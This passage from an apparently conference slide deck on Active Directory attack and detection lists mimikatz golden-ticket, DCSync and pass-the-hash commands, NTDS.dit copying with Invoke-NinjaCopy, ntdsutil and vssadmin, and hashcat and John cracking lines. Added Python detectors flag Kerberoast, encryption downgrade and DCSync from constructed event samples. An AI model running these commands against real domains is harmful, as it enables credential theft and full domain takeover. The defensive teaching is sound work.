mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
60. DCSYNC
• It "impersonates" a Domain Controller and requests account password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
62. DCSHADOW
Registers new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right.
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
(Diagram caption: "Hi guys! This is DCShadow!")
68. NTDS.DIT
How to get hashes from it:
1. Decrypt the Password Encryption Key (PEK). The PEK is encrypted using the bootkey
2. First round of hash decryption with the PEK using RC4
3. Second round of hash decryption with DES
69. GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
Ntdsutil
Invoke-NinjaCopy
Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
vssadmin create shadow /for=C:
72. CRACKING NT HASHES
John the Ripper:
john FILE_HASHES --format=NT
Hashcat & rockyou wordlist:
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot
77. PASS-THE-HASH
• Detection based on local Security events
• Not captured by ATA by default
• Force NTLM to be used
• Overpass-the-hash: the encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
80. GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
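Added detection example (not the deck's code) covering three Kerberos points made on slides 40, 77 and 80: Kerberoast (many RC4 service tickets for user-account SPNs from one requester), overpass-the-hash (an RC4 TGT request from an account that normally authenticates with AES, the "encryption downgrade"), and golden tickets (a lifetime longer than the domain's 10-hour default, which is why the command above sets /endin:600 and /renewmax:10080). The events are constructed records shaped like Security log 4768/4769 fields; the thresholds, window and per-account etype baseline are this example's assumptions.

```python
"""Kerberos checks over constructed 4768/4769-style events. Added example;
field names mirror the Windows Security log, values are made up."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

RC4_HMAC = 0x17              # etype 23: used by Kerberoast and by NT-hash-based overpass-the-hash
AES_ETYPES = {0x11, 0x12}    # AES128 / AES256, the keys the deck lists next to the NT hash

# Constructed sample events (4769 = TGS request, 4768 = TGT request).
EVENTS = [
    {"id": 4769, "time": "2018-03-02T10:00:01", "user": "jdoe@ROOTED.CON", "service": "svc_sql",    "etype": 0x17, "ip": "10.0.0.5"},
    {"id": 4769, "time": "2018-03-02T10:00:02", "user": "jdoe@ROOTED.CON", "service": "svc_web",    "etype": 0x17, "ip": "10.0.0.5"},
    {"id": 4769, "time": "2018-03-02T10:00:03", "user": "jdoe@ROOTED.CON", "service": "svc_backup", "etype": 0x17, "ip": "10.0.0.5"},
    {"id": 4769, "time": "2018-03-02T10:00:04", "user": "jdoe@ROOTED.CON", "service": "WS01$",      "etype": 0x12, "ip": "10.0.0.5"},
    {"id": 4769, "time": "2018-03-02T10:30:00", "user": "alice@ROOTED.CON", "service": "svc_sql",   "etype": 0x12, "ip": "10.0.0.9"},
    {"id": 4768, "time": "2018-03-02T11:00:00", "user": "alice", "etype": 0x12, "ip": "10.0.0.9"},
    {"id": 4768, "time": "2018-03-02T11:05:00", "user": "alice", "etype": 0x17, "ip": "10.0.0.77"},
]
# Constructed baseline: the etypes each account has been seen authenticating with.
BASELINE_ETYPES: Dict[str, Set[int]] = {"alice": {0x12}, "jdoe": {0x12}}


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def kerberoast_candidates(events: List[dict], min_spns: int = 3,
                          window: timedelta = timedelta(minutes=10)) -> Dict[str, List[str]]:
    """Requesters that pulled RC4 service tickets for >= min_spns distinct
    user-account services inside one window. Computer accounts ('$') and
    krbtgt are skipped: the deck says the attack focuses on user accounts."""
    by_user: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        by_user[e["user"]].append((_t(e["time"]), svc))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for t0, _ in reqs:                      # slide a window from each request
            spns = {s for t, s in reqs if t0 <= t <= t0 + window}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits


def downgrade_candidates(events: List[dict], baseline: Dict[str, Set[int]]) -> List[Tuple[str, str]]:
    """4768 TGT requests with RC4 from an account whose baseline is AES-only:
    the encryption downgrade that exposes overpass-the-hash with an NT hash."""
    out = []
    for e in events:
        if e["id"] != 4768 or e["etype"] != RC4_HMAC:
            continue
        seen = baseline.get(e["user"])
        if seen is not None and RC4_HMAC not in seen and seen & AES_ETYPES:
            out.append((e["user"], e["ip"]))
    return out


def ticket_lifetime_anomaly(start: datetime, end: datetime, renew_until: datetime,
                            max_ticket: timedelta = timedelta(hours=10),
                            max_renew: timedelta = timedelta(days=7)) -> bool:
    """True when a ticket outlives the domain policy (AD defaults: 10 h ticket,
    7 d renewal). A KDC never issues such a ticket, so it was forged."""
    return (end - start) > max_ticket or (renew_until - start) > max_renew


if __name__ == "__main__":
    print(kerberoast_candidates(EVENTS))
    print(downgrade_candidates(EVENTS, BASELINE_ETYPES))
```

The lifetime check needs the ticket itself (from a klist dump or a network capture of the TGT), not the 4768/4769 events, which is why products such as ATA inspect Kerberos traffic rather than only the Security log; the etype checks, by contrast, work from DC event logs alone.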
83. DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected.
84. DCSYNC
Diagram: Microsoft ATA observing the attacker's DRS traffic towards the DC.
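Added example (not from the deck) of the host-side counterpart of the network detection above: when replication is requested, the DC logs Security event 4662 whose Properties list the control-access-right GUIDs for DS-Replication-Get-Changes, and the requester should only ever be a domain controller computer account. The event lines are constructed in a key=value export format assumed for this example; the three replication-right GUIDs are the published values.

```python
"""Flag 4662 events where a non-DC principal exercised a replication right.
Added example; the event lines are constructed, the GUIDs are real."""
import re
from typing import Dict, List, Tuple

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS: the AccessMask used for extended rights

# Constructed sample export: a legitimate DC replicating, a user account doing
# the same (DCSync), an unrelated 4662 without replication rights, and a 4624.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=DC02$ SubjectDomainName=ROOTED AccessMask=0x100 Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=jdoe SubjectDomainName=ROOTED AccessMask=0x100 Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=jdoe SubjectDomainName=ROOTED AccessMask=0x10 Properties=%%7685 {00000000-0000-0000-0000-000000000000}
EventID=4624 SubjectUserName=jdoe SubjectDomainName=ROOTED
"""

_FIELD = re.compile(r"(EventID|SubjectUserName|SubjectDomainName|AccessMask)=(\S+)")
_GUID = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line: str) -> Dict[str, object]:
    """Pull the fields this check needs plus every GUID in the Properties list."""
    ev: Dict[str, object] = dict(_FIELD.findall(line))
    ev["guids"] = {g.lower() for g in _GUID.findall(line)}
    return ev


def dcsync_suspects(export: str, dc_accounts: List[str]) -> List[Tuple[str, List[str]]]:
    """(DOMAIN\\subject, [rights]) for 4662 events that used a replication
    right with Control Access and did not come from a known DC account."""
    known_dcs = {d.upper() for d in dc_accounts}
    suspects = []
    for line in export.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        if int(str(ev.get("AccessMask", "0")), 16) & CONTROL_ACCESS == 0:
            continue
        rights = sorted(REPLICATION_RIGHTS[g] for g in ev["guids"] & set(REPLICATION_RIGHTS))
        if not rights:
            continue
        subject = str(ev.get("SubjectUserName", ""))
        if subject.upper() in known_dcs:
            continue
        suspects.append((f'{ev.get("SubjectDomainName", "")}\\{subject}', rights))
    return suspects


if __name__ == "__main__":
    for who, rights in dcsync_suspects(SAMPLE_4662, ["DC01$", "DC02$"]):
        print(who, rights)
```

Before deploying this, extend the allowlist with the non-DC principals that legitimately replicate in your forest (for instance the Azure AD Connect synchronisation account), and audit who holds these rights on the domain head in the first place: the deck's "special rights are required" is the control, and this check tells you when someone used them.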
93. BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain, all users, servers, workstations and data.
Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.
"Once domain admin, always domain admin"
94. ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain